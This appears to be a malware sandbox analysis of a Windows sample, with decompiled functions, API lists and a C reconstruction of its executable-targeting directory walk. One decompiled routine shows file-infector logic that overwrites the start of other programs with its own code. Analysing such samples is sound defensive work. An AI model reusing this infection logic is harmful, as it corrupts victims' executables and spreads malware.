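    *count = 0;
#ifdef _WIN32
    char pattern[MAX_PATH];
    WIN32_FIND_DATAA fd;
    snprintf(pattern, sizeof pattern, "%s\\*.*", dir);  /* the "*.*" string ID above */
    HANDLE h = FindFirstFileA(pattern, &fd);
    if (h == INVALID_HANDLE_VALUE) return NULL;         /* the "handle + 1 != 0" test */
    do {
        append_if_accepted(fd.cFileName, (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) != 0,
                           filter, ctx, &tail, count);
    } while (FindNextFileA(h, &fd));
    FindClose(h);
#else
    DIR *d = opendir(dir);
    struct dirent *de;
    if (d == NULL) return NULL;
    while ((de = readdir(d)) != NULL) {
        char path[4096];
        struct stat st;
        snprintf(path, sizeof path, "%s/%s", dir, de->d_name);
        append_if_accepted(de->d_name, stat(path, &st) == 0 && S_ISDIR(st.st_mode),
                           filter, ctx, &tail, count);
    }
    closedir(d);
#endif
    return head;
}

void free_entries(entry_t *e) { while (e != NULL) { entry_t *n = e->next; free(e); e = n; } }

/* Constructed fixture: one subdirectory plus a mix of file names, so the walk has input. */
int build_fixture(const char *dir) {
    static const char *names[] = {"a.exe", "b.EXE", "c.dll", "notes.txt", "d.sys.bak", NULL};
    char path[4096];
    if (MKDIR(dir) != 0 && errno != EEXIST) return 0;
    snprintf(path, sizeof path, "%s/sub", dir);
    if (MKDIR(path) != 0 && errno != EEXIST) return 0;
    for (const char **n = names; *n != NULL; ++n) {
        snprintf(path, sizeof path, "%s/%s", dir, *n);
        FILE *fp = fopen(path, "wb");
        if (fp == NULL) return 0;
        fclose(fp);
    }
    return 1;
}
```

Calling build_fixture("dir") and then enumerate_dir("dir", ext_filter, exts, &n) with exts = {"exe", "dll", "sys", NULL} yields a.exe, b.EXE and c.dll: the "sub" directory, notes.txt and d.sys.bak are rejected, and "." and ".." never reach the filter. That last check is the one to look for when reading an enumerator like the listing above, since FindFirstFileA("dir\*.*") returns both pseudo-entries and a walker that forwards them unfiltered treats the directory itself as a candidate; here that test lives in the helper E0040536C, whose body is not in this section.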

                                                                          Control-flow Graph

                                                                          control_flow_graph 556 404f6c-404f7a FindFirstFileA 557 404f87-404f8d 556->557 558 404f7c-404f83 FindClose 556->558 558->557
                                                                          C-Code - Quality: 100%
                                                                          			E00404F6C(CHAR* __eax) {
                                                                          				intOrPtr _v288;
                                                                          				void* _t3;
                                                                          				void* _t4;
                                                                          				struct _WIN32_FIND_DATAA* _t8;
                                                                          
                                                                          				_t3 = FindFirstFileA(__eax, _t8); // executed
                                                                          				_t4 = _t3 + 1;
                                                                          				if(_t4 != 0) {
                                                                          					FindClose(_t4 - 1); // executed
                                                                          					return _v288;
                                                                          				}
                                                                          				return _t4;
                                                                          			}

Instruction address column (listing residue, instruction text not extracted): 0x00404f74, 0x00404f79, 0x00404f7a, 0x00404f7e, 0x00000000, 0x00404f83, 0x00404f8d

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(?,?,0040818B,00000000,00408220), ref: 00404F74
                                                                          • FindClose.KERNEL32(00000000,?,?,0040818B,00000000,00408220), ref: 00404F7E
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 47f9ec76bd499baa866f378b061b69eb1c32c010a676678d587083082739568e
                                                                          • Instruction ID: 35bd28bbec0286cbaf15e580cccf41787655d5f9f594f83c1a320a5651e29ebc
                                                                          • Opcode Fuzzy Hash: 47f9ec76bd499baa866f378b061b69eb1c32c010a676678d587083082739568e
                                                                          • Instruction Fuzzy Hash: B8C08CE480010023C80033AA8C06A27204CBAC0358F88092A7BA8F72C3C93E891040AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

Legend: Executed / Not Executed (graph image not rendered in this extraction)

[Control-flow graph data for E00406638: basic blocks numbered 0 to 150, entry block 0 at 406638-406663, final block 6 at 406b1c-406b25; blocks call GetObjectA and CopyImage and the internal routines E0040598C, E0040456C, E00405FD8, E00404520, E00402660, E0040465C, E004061E0, E004065CC, E00406598, E00406624, E00402BEC, E00406218, E00406580, E00406154 and E004045E8]
                                                                          C-Code - Quality: 78%
                                                                          			E00406638(void** __eax, intOrPtr __ecx, unsigned int __edx) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				short _v14;
                                                                          				char _v17;
                                                                          				signed int _v18;
                                                                          				char _v19;
                                                                          				int _v20;
                                                                          				void** _v24;
                                                                          				unsigned int _v28;
                                                                          				intOrPtr _v32;
                                                                          				char _v33;
                                                                          				int _v40;
                                                                          				intOrPtr _v44;
                                                                          				void* _v48;
                                                                          				intOrPtr _v52;
                                                                          				intOrPtr _v56;
                                                                          				signed short _v58;
                                                                          				short _v60;
                                                                          				short _v62;
                                                                          				intOrPtr _v68;
                                                                          				void* _v72;
                                                                          				void** _v76;
                                                                          				void** _v80;
                                                                          				intOrPtr _v100;
                                                                          				signed short _v106;
                                                                          				short _v108;
                                                                          				int _v112;
                                                                          				int _v116;
                                                                          				char _v120;
                                                                          				short _v126;
                                                                          				intOrPtr _v128;
                                                                          				int _v136;
                                                                          				int _v140;
                                                                          				void _v144;
                                                                          				void* __ebp;
                                                                          				signed int _t138;
                                                                          				signed int _t139;
                                                                          				void* _t141;
                                                                          				unsigned int _t152;
                                                                          				void* _t154;
                                                                          				void* _t162;
                                                                          				void* _t179;
                                                                          				void* _t181;
                                                                          				void* _t199;
                                                                          				void* _t201;
                                                                          				void* _t207;
                                                                          				void* _t212;
                                                                          				void* _t214;
                                                                          				signed int _t220;
                                                                          				void* _t221;
                                                                          				void* _t229;
                                                                          				void* _t232;
                                                                          				void* _t243;
                                                                          				void* _t255;
                                                                          				intOrPtr _t264;
                                                                          				void* _t274;
                                                                          				void* _t275;
                                                                          				int _t293;
                                                                          				int _t294;
                                                                          				intOrPtr _t318;
                                                                          				void* _t324;
                                                                          				void* _t366;
                                                                          				void* _t369;
                                                                          				int _t375;
                                                                          				int _t376;
                                                                          				void* _t378;
                                                                          				void* _t380;
                                                                          				intOrPtr _t381;
                                                                          
                                                                          				_t378 = _t380;
                                                                          				_t381 = _t380 + 0xffffff74;
                                                                          				_v32 = __ecx;
                                                                          				_v28 = __edx;
                                                                          				_v24 = __eax;
                                                                          				_v33 = 0;
                                                                          				_v62 = 0;
                                                                          				_v60 = 1;
                                                                          				_t138 = _v28 + 1;
                                                                          				_t139 = _t138 >> 1;
                                                                          				if(_t138 < 0) {
                                                                          					asm("adc eax, 0x0");
                                                                          				}
                                                                          				_v58 = _t139;
                                                                          				_t141 = E0040598C(_v32);
                                                                          				_t384 = _t141 - 6;
                                                                          				if(_t141 != 6) {
                                                                          					L59:
                                                                          					return _v33;
                                                                          				} else {
                                                                          					_v44 = ((_v58 & 0x0000ffff) << 4) + 6;
                                                                          					_v68 = E0040456C();
                                                                          					_v52 = E00405FD8(0, 0, _t384);
                                                                          					_v56 = E00405FD8(0, 0, _t384);
                                                                          					_push(_t378);
                                                                          					_push(0x406b11);
                                                                          					_push( *[fs:ecx]);
                                                                          					 *[fs:ecx] = _t381;
                                                                          					_t152 = _v28 >> 1;
                                                                          					if(_t152 < 0) {
                                                                          						L22:
                                                                          						_t154 = _v28 >> 1;
                                                                          						__eflags = _t154;
                                                                          						if(_t154 < 0) {
                                                                          							L57:
                                                                          							__eflags = 0;
                                                                          							_pop(_t318);
                                                                          							 *[fs:eax] = _t318;
                                                                          							_push(E00406B18);
                                                                          							E00404520(_v68);
                                                                          							E00404520(_v52);
                                                                          							return E00404520(_v56);
                                                                          						} else {
                                                                          							_t162 = _t154 + 1;
                                                                          							__eflags = _t162;
                                                                          							_v72 = _t162;
                                                                          							_v40 = 0;
                                                                          							_v80 = _v24;
                                                                          							do {
                                                                          								_t366 =  *_v80;
                                                                          								_v48 = _v80[1];
                                                                          								__eflags = _t366;
                                                                          								if(_t366 != 0) {
                                                                          									L26:
                                                                          									GetObjectA(_v48, 0x18,  &_v144);
                                                                          									_t293 = _v140;
                                                                          									_t375 = _v136;
                                                                          									E00402660( &_v120, 0x28);
                                                                          									_v120 = 0x28;
                                                                          									_v116 = _t293;
                                                                          									_v112 = _t375;
                                                                          									__eflags = _t366;
                                                                          									if(_t366 != 0) {
                                                                          										_t243 = _t293 + _t293;
                                                                          										__eflags = _t243;
                                                                          										_v112 = _t243;
                                                                          									}
                                                                          									_v108 = 1;
                                                                          									_v18 = E0040465C(_v68, _v40);
                                                                          									__eflags = _v14;
                                                                          									if(_v14 == 0) {
                                                                          										_v14 = E00406580(_v18 & 0x0000ffff);
                                                                          									}
                                                                          									_v106 = _v14;
                                                                          									_push(E004065CC(_t293, _t375, _t378) + 0x28);
                                                                          									_t179 = E00406624(_t293, _t375);
                                                                          									_pop(_t324);
                                                                          									_v100 = _t324 + _t179;
                                                                          									_t181 = E0040598C(_v32);
                                                                          									__eflags = _t181 - 0x28;
                                                                          									if(_t181 == 0x28) {
                                                                          										__eflags = _t366;
                                                                          										if(__eflags == 0) {
                                                                          											E004061E0(_v52, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
                                                                          											E00406218(_v52, 0x28, 1, _t378, __eflags);
                                                                          										} else {
                                                                          											E004061E0(_v52, CopyImage(_t366, 0, _t293, _t375, 0), __eflags);
                                                                          											_t220 = _v106 & 0x0000ffff;
                                                                          											__eflags = _t220 - 0x10;
                                                                          											if(__eflags > 0) {
                                                                          												_t221 = _t220 - 0x18;
                                                                          												__eflags = _t221;
                                                                          												if(__eflags == 0) {
                                                                          													E00406218(_v52, 0x28, 6, _t378, __eflags);
                                                                          												} else {
                                                                          													__eflags = _t221 - 8;
                                                                          													if(__eflags == 0) {
                                                                          														E00406218(_v52, 0x28, 7, _t378, __eflags);
                                                                          													}
                                                                          												}
                                                                          											} else {
                                                                          												if(__eflags == 0) {
                                                                          													E00406218(_v52, 0x28, 5, _t378, __eflags);
                                                                          												} else {
                                                                          													_t229 = _t220 - 1;
                                                                          													__eflags = _t229;
                                                                          													if(__eflags == 0) {
                                                                          														E00406218(_v52, 0x28, 1, _t378, __eflags);
                                                                          													} else {
                                                                          														_t232 = _t229 - 3;
                                                                          														__eflags = _t232;
                                                                          														if(__eflags == 0) {
                                                                          															E00406218(_v52, 0x28, 2, _t378, __eflags);
                                                                          														} else {
                                                                          															__eflags = _t232 - 4;
                                                                          															if(__eflags == 0) {
                                                                          																E00406218(_v52, 0x28, 3, _t378, __eflags);
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										__eflags =  *(_v52 + 0x41);
                                                                          										if(__eflags == 0) {
                                                                          											L54:
                                                                          											E004061E0(_v56, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
                                                                          											E00406218(_v56, 0x28, 1, _t378, __eflags);
                                                                          											E00406624(_t293, _t375);
                                                                          											_t199 = E0040598C(_v32);
                                                                          											_t201 = E00406624(_t293, _t375);
                                                                          											__eflags = _t199 - _t201;
                                                                          											if(_t199 == _t201) {
                                                                          												goto L56;
                                                                          											} else {
                                                                          												E00402BEC();
                                                                          												goto L59;
                                                                          											}
                                                                          										} else {
                                                                          											_t207 = E0040598C(_v32);
                                                                          											__eflags = _t207 - (_v18 & 0x0000ffff) << 2;
                                                                          											if(_t207 == (_v18 & 0x0000ffff) << 2) {
                                                                          												E004065CC(_t293, _t375, _t378);
                                                                          												_t212 = E0040598C(_v32);
                                                                          												_t214 = E004065CC(_t293, _t375, _t378);
                                                                          												_pop(0x28);
                                                                          												__eflags = _t212 - _t214;
                                                                          												if(__eflags == 0) {
                                                                          													goto L54;
                                                                          												} else {
                                                                          													E00402BEC();
                                                                          													goto L59;
                                                                          												}
                                                                          											} else {
                                                                          												E00402BEC();
                                                                          												goto L59;
                                                                          											}
                                                                          										}
                                                                          									} else {
                                                                          										E00402BEC();
                                                                          										goto L59;
                                                                          									}
                                                                          								} else {
                                                                          									__eflags = _v48;
                                                                          									if(_v48 == 0) {
                                                                          										goto L57;
                                                                          									} else {
                                                                          										goto L26;
                                                                          									}
                                                                          								}
                                                                          								goto L60;
                                                                          								L56:
                                                                          								_v40 = _v40 + 1;
                                                                          								_v80 =  &(_v80[2]);
                                                                          								_t130 =  &_v72;
                                                                          								 *_t130 = _v72 - 1;
                                                                          								__eflags =  *_t130;
                                                                          							} while ( *_t130 != 0);
                                                                          							goto L57;
                                                                          						}
                                                                          					} else {
                                                                          						_v72 = _t152 + 1;
                                                                          						_v76 = _v24;
                                                                          						while(1) {
                                                                          							_t369 =  *_v76;
                                                                          							_v48 = _v76[1];
                                                                          							if(_t369 == 0 && _v48 == 0) {
                                                                          								goto L22;
                                                                          							}
                                                                          							GetObjectA(_v48, 0x18,  &_v144);
                                                                          							_t294 = _v140;
                                                                          							_t376 = _v136;
                                                                          							if(_t369 != 0) {
                                                                          								GetObjectA(_t369, 0x18,  &_v144);
                                                                          							}
                                                                          							E00402660( &_v20, 0x10);
                                                                          							_v20 = _t294;
                                                                          							_v19 = _t376;
                                                                          							if(_t369 != 0) {
                                                                          								_t255 = CopyImage(_t369, 0, _t294, _t376, 0x2000); // executed
                                                                          								E004061E0(_v52, _t255, __eflags);
                                                                          								E00402660( &_v120, 0x28);
                                                                          								_v120 = 0x28;
                                                                          								GetObjectA(E00406154(_v52, __eflags), 0x18,  &_v144);
                                                                          								_t264 = _v128;
                                                                          								__eflags = _t264 - 1;
                                                                          								if(_t264 != 1) {
                                                                          									L14:
                                                                          									_t310 = _v126;
                                                                          									__eflags = 1 - 0x10;
                                                                          									if(1 >= 0x10) {
                                                                          										__eflags = 1 - 0x100;
                                                                          										if(1 >= 0x100) {
                                                                          											E00406218(_v52, _t310, 3, _t378, 1 - 0x100);
                                                                          											_v18 = 0;
                                                                          											_v17 = 1;
                                                                          										} else {
                                                                          											E00406218(_v52, _t310, 2, _t378, 1 - 0x100);
                                                                          											_v18 = 0x10;
                                                                          										}
                                                                          									} else {
                                                                          										E00406218(_v52, _t310, 1, _t378, 1 - 0x10);
                                                                          										_v18 = 2;
                                                                          									}
                                                                          								} else {
                                                                          									__eflags = _v126 - 0xf;
                                                                          									if(_v126 < 0xf) {
                                                                          										goto L14;
                                                                          									} else {
                                                                          										_v18 = 0;
                                                                          										_v17 = 0;
                                                                          										_v14 = _v126;
                                                                          									}
                                                                          								}
                                                                          							} else {
                                                                          								_v18 = 2;
                                                                          							}
                                                                          							E004045E8(_v68, 0xbadbad);
                                                                          							_t274 = E004065CC(_t294, _t376, _t378);
                                                                          							_t275 = E00406598(_t378);
                                                                          							_v12 = _t274 + _t275 + 0x28 + E00406624(_t294, _t376);
                                                                          							_v8 = _v44;
                                                                          							if(E0040598C(_v32) == 0x10) {
                                                                          								_v44 = _v44 + _v12;
                                                                          								_v76 =  &(_v76[2]);
                                                                          								_t66 =  &_v72;
                                                                          								 *_t66 = _v72 - 1;
                                                                          								__eflags =  *_t66;
                                                                          								if( *_t66 != 0) {
                                                                          									continue;
                                                                          								} else {
                                                                          									goto L22;
                                                                          								}
                                                                          							} else {
                                                                          								E00402BEC();
                                                                          								goto L59;
                                                                          							}
                                                                          							goto L60;
                                                                          						}
                                                                          						goto L22;
                                                                          					}
                                                                          				}
                                                                          				L60:
                                                                          			}

                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406700
                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040671F
                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00406789
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004068BE
                                                                          • CopyImage.USER32(00000000,00000000,?,?,00000000), ref: 00406977
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 004069FE
                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00406752
                                                                            • Part of subcall function 004061E0: GetObjectA.GDI32(00000000,00000018), ref: 004061F2
                                                                            • Part of subcall function 00406154: 72E7AC50.USER32(00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00406177
                                                                            • Part of subcall function 00406154: 72E7A7A0.GDI32(00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000), ref: 00406192
                                                                            • Part of subcall function 00406154: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000), ref: 0040619D
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00406A93
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$CopyImage$B380
                                                                          • String ID: (
                                                                          • API String ID: 1117845954-3887548279
                                                                          • Opcode ID: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                          • Instruction ID: 8b23a46e2d3205504fa6020bfc4f244d26e515b74d7163ba5290a0ebff7405a2
                                                                          • Opcode Fuzzy Hash: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                          • Instruction Fuzzy Hash: 37E16170A002189BDB10EBA9D885AAEB7F5AF49304F11807BF405FB3C1DA3D9D55CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 83%
                                                                          			E004071D0(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                          				char _v8;
                                                                          				char _v9;
                                                                          				char _v16;
                                                                          				char _v40254;
                                                                          				char _v41487;
                                                                          				char _v41488;
                                                                          				char _v41492;
                                                                          				char _v41496;
                                                                          				char _v41500;
                                                                          				char _v41504;
                                                                          				void* _t45;
                                                                          				void* _t80;
                                                                          				void* _t82;
                                                                          				long _t85;
                                                                          				CHAR* _t130;
                                                                          				intOrPtr _t150;
                                                                          				void* _t154;
                                                                          				void* _t155;
                                                                          				long _t173;
                                                                          				void* _t177;
                                                                          				void* _t178;
                                                                          
                                                                          				_t128 = __ebx;
                                                                          				_t177 = _t178;
                                                                          				_push(__eax);
                                                                          				_t45 = 0xa;
                                                                          				goto L1;
                                                                          				L17:
                                                                          				_pop(_t150);
                                                                          				 *[fs:eax] = _t150;
                                                                          				_push(E00407493);
                                                                          				E004030B8( &_v41504, 4);
                                                                          				return E00403094( &_v8);
                                                                          				L1:
                                                                          				_t178 = _t178 + 0xfffff004;
                                                                          				_push(_t45);
                                                                          				_t45 = _t45 - 1;
                                                                          				_t180 = _t45;
                                                                          				if(_t45 != 0) {
                                                                          					goto L1;
                                                                          				} else {
                                                                          					_push(__ebx);
                                                                          					_v41504 = 0;
                                                                          					_v41500 = 0;
                                                                          					_v41496 = 0;
                                                                          					_v41492 = 0;
                                                                          					E004033FC(_v8);
                                                                          					_push(_t177);
                                                                          					_push(0x40748c);
                                                                          					_push( *[fs:eax]);
                                                                          					 *[fs:eax] = _t178 + 0xfffffde8;
                                                                          					_v9 = 0;
                                                                          					E004031F4( &_v41492, 3, 0x4091c0);
                                                                          					if(E00406FE4(_v8, __ebx, _v41492, _t180) != 0) {
                                                                          						E00404F34(_v8,  &_v41496);
                                                                          						E0040312C( &_v8, _v41496);
                                                                          						E00404F90( &_v41500, _t128, 3);
                                                                          						_push(E0040340C(_v41500));
                                                                          						_t129 = E0040340C(_v8);
                                                                          						_pop(_t154);
                                                                          						if(E00404B38(_t68, _t154) == 0) {
                                                                          							E00405008( &_v41504, _t129, 3);
                                                                          							_t155 = E0040340C(_v41504);
                                                                          							if(E00404B38(_t129, _t155) == 0 && E004034EC("\\PROGRA~1\\", _v8) != 3) {
                                                                          								_t80 = E00404F6C(_v8);
                                                                          								if(_t80 > 0xa200 && _t80 <= 0x989680) {
                                                                          									_t82 = E00407130(_v8, _t129); // executed
                                                                          									if(_t82 == 0) {
                                                                          										_v9 = 1;
                                                                          										_t130 = E0040340C(_v8);
                                                                          										_t85 = GetFileAttributesA(_t130); // executed
                                                                          										_t173 = _t85;
                                                                          										if((_t173 & 0x00000001) > 0) {
                                                                          											SetFileAttributesA(_t130, 0);
                                                                          										}
                                                                          										_t131 = E00405BDC();
                                                                          										_t175 = E004064CC();
                                                                          										E00406CA8(_t87, 0, _v8);
                                                                          										E00406510(_t175, _t86);
                                                                          										E00405974();
                                                                          										E00404198();
                                                                          										E00405988(_t131);
                                                                          										E00404520(_t131);
                                                                          										E00404520(_t175);
                                                                          										_t132 = E00404B68(_v8, 0xc0000303);
                                                                          										if(_t103 != 0xffffffff) {
                                                                          											E00404BC4(_t132, 2,  &_v41488);
                                                                          											if(_v41488 == 0x4d && _v41487 == 0x5a) {
                                                                          												E00404BB4(_t132, 0, 0);
                                                                          												E00404BC4(_t132, 0xa200,  &_v41488);
                                                                          												E0040254C( &_v40254, 4,  &_v16);
                                                                          												E00407080( &_v41488, _v16, 0x3e8);
                                                                          												E00404BB4(_t132, 0, 0);
                                                                          												E00404BE0(_t132, 0xa200, 0x40a698);
                                                                          												E00404BB4(_t132, 2, 0);
                                                                          												E00404BE0(_t132, 0xa200,  &_v41488);
                                                                          											}
                                                                          										}
                                                                          										E00404B90(_t132);
                                                                          										if((_t173 & 0x00000001) > 0) {
                                                                          											SetFileAttributesA(E0040340C(_v8), _t173);
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					goto L17;
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407461
                                                                            • Part of subcall function 00404BC4: ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                            • Part of subcall function 00404BB4: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                          • API String ID: 997383822-4093836345
                                                                          • Opcode ID: 41512908c4d33e48550e6b3331c925b36c29bc90fc27bbf57195ac31950a3692
                                                                          • Instruction ID: 377d96c4788612fdddee84976f6eb16641268004b287eb3b442383de46351668
                                                                          • Opcode Fuzzy Hash: 41512908c4d33e48550e6b3331c925b36c29bc90fc27bbf57195ac31950a3692
                                                                          • Instruction Fuzzy Hash: 71514370B042045BDB10FB6ACC82A8EB7A59F85308F1085BBB504B73D3DA7DEF454A5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 68%
                                                                          			E00401788() {
                                                                          				void* _t11;
                                                                          				signed int _t13;
                                                                          				intOrPtr _t19;
                                                                          				void* _t20;
                                                                          				intOrPtr _t23;
                                                                          
                                                                          				_push(_t23);
                                                                          				_push(E0040183E);
                                                                          				_push( *[fs:edx]);
                                                                          				 *[fs:edx] = _t23;
                                                                          				_push(0x40a5b4);
                                                                          				L004010DC();
                                                                          				if( *0x40a035 != 0) {
                                                                          					_push(0x40a5b4);
                                                                          					L004010E4();
                                                                          				}
                                                                          				E0040114C(0x40a5d4);
                                                                          				E0040114C(0x40a5e4);
                                                                          				E0040114C(0x40a610);
                                                                          				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                          				 *0x40a60c = _t11;
                                                                          				if( *0x40a60c != 0) {
                                                                          					_t13 = 3;
                                                                          					do {
                                                                          						_t20 =  *0x40a60c; // 0x570960
                                                                          						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                          						_t13 = _t13 + 1;
                                                                          					} while (_t13 != 0x401);
                                                                          					 *((intOrPtr*)(0x40a5f8)) = 0x40a5f4;
                                                                          					 *0x40a5f4 = 0x40a5f4;
                                                                          					 *0x40a600 = 0x40a5f4;
                                                                          					 *0x40a5ac = 1;
                                                                          				}
                                                                          				_pop(_t19);
                                                                          				 *[fs:eax] = _t19;
                                                                          				_push(0x401845);
                                                                          				if( *0x40a035 != 0) {
                                                                          					_push(0x40a5b4);
                                                                          					L004010EC();
                                                                          					return 0;
                                                                          				}
                                                                          				return 0;
                                                                          			}

                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID: `W
                                                                          • API String ID: 730355536-2472242476
                                                                          • Opcode ID: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                          • Instruction ID: b00ea9f5082304a52c30b3310984ccb38099dd734a88c9f27aa2559637ee1f83
                                                                          • Opcode Fuzzy Hash: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                          • Instruction Fuzzy Hash: 400184B0604380AEE715AF6A9D06B167BA4E749704F04C53FA140B66F2CA7D44A0CB5F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph 314 401e74-401e86 315 401e91-401e97 314->315 316 401e88 call 401788 314->316 318 401ea3-401eb8 315->318 319 401e99-401e9e 315->319 323 401e8d-401e8f 316->323 321 401ec4-401ecd 318->321 322 401eba-401ebf RtlEnterCriticalSection 318->322 320 401ff7-402000 319->320 324 401ed4-401eda 321->324 325 401ecf 321->325 322->321 323->315 323->319 326 401ee0-401ee4 324->326 327 401f73-401f79 324->327 325->324 330 401ee6 326->330 331 401ee9-401ef8 326->331 328 401fc5-401fc7 call 401d80 327->328 329 401f7b-401f88 327->329 339 401fcc-401fe3 328->339 332 401f97-401fc3 call 402bec 329->332 333 401f8a-401f92 329->333 330->331 331->327 334 401efa-401f08 331->334 332->320 333->332 337 401f24-401f28 334->337 338 401f0a-401f0e 334->338 344 401f2a 337->344 345 401f2d-401f48 337->345 341 401f10 338->341 342 401f13-401f22 338->342 347 401fe5-401fea RtlLeaveCriticalSection 339->347 348 401fef 339->348 341->342 346 401f4a-401f6e call 402bec 342->346 344->345 345->346 346->320 347->348
                                                                          APIs
                                                                            • Part of subcall function 00401788: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                            • Part of subcall function 00401788: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
